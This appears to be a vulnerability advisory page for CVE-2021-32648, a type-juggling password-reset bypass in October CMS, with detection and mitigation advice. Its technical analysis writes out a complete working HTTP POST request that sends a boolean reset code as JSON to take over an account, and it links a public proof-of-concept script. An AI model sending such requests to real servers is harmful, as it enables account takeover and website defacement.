Low
CVE-2021-32648
CVE-2021-32648
Description
octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.
Add Assessment
Technical Analysis
Ovewrview
This is a simple Type Confusion / Juggling vulnerability.
October CMS will check to see if the User Supplied reset code matches the value in the database return ($this->reset_password_code == $resetCode);
If we can send a boolean value in place of a reset code we can bypass this check.
Laravel has a feature that if an HTTP POST request is sent as JSON then It will be converted to a matching form data set however the types will persist.
To exploit this vulnerability we simply need to set the Content-Type to JSON and structure our POST request accordingly. An example POST is shown below.
POST /backend/backend/auth/reset/1/[] HTTP/1.1 Host: 172.17.0.2 Content-Length: 162 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://172.17.0.2 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://172.17.0.2/backend/backend/auth/reset/1/a Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: october_session=eyJpdiI6ImlGZHMrRTVEUGh6dHkxWllEeVF5dEE9PSIsInZhbHVlIjoiV2tkcmsrbkJxa2R6OWg1TVFLbTQ2Y1pTSG9ZT1RYTEFwdlY0YVVRVEU5a0pxbG5LdE81WVpXeDdGa3pHclhTWGhkbEE2WGZPME82aEpVWFBqcktEakR6Qng3WVpsWUdzYm9mOG9cL0YxTjNXbXFyUEZxWGNVM1BrcmJLaFVIZXVaIiwibWFjIjoiZmVkMDljNGE2MDc2ZGI5NjgyOThkMDJjZGFhNDcxYzg3MTNlNmJhZTRiYmIzZmVkYjNmYTUyMzA4ZjQxMjdiNiJ9 Connection: close {"_session_key":"RQjdfLkFotyuA4BHOjVykboK3DHByTyDFEs7xZXC","_token":"jBD7MXYuIrYC4n0GClVCigIBrSOShoUICwy3gShS","postback":1,"id":1,"code":true,"password":"hello"}
In the Wild
This has not been verified but initial reports suggest this vulnerability was used to deface a set of Ukrainian government websites – https://twitter.com/KimZetter/status/1481890639029551106
PoC
A proof of concept python script that will attempt to reset the password for the admin account has been published – https://github.com/Immersive-Labs-Sec/CVE-2021-32648
Detection
An attacker attempting to exploit this attack will need to trigger a password reset email. If you observe password reset emails then check access to the server and respond accordingly.
Mitigation
Applying the patches will successfully mitigate against this attack.
CVSS V3 Severity and Metrics
General Information
Vendors
- octobercms
Products
- october
Exploited in the Wild
References
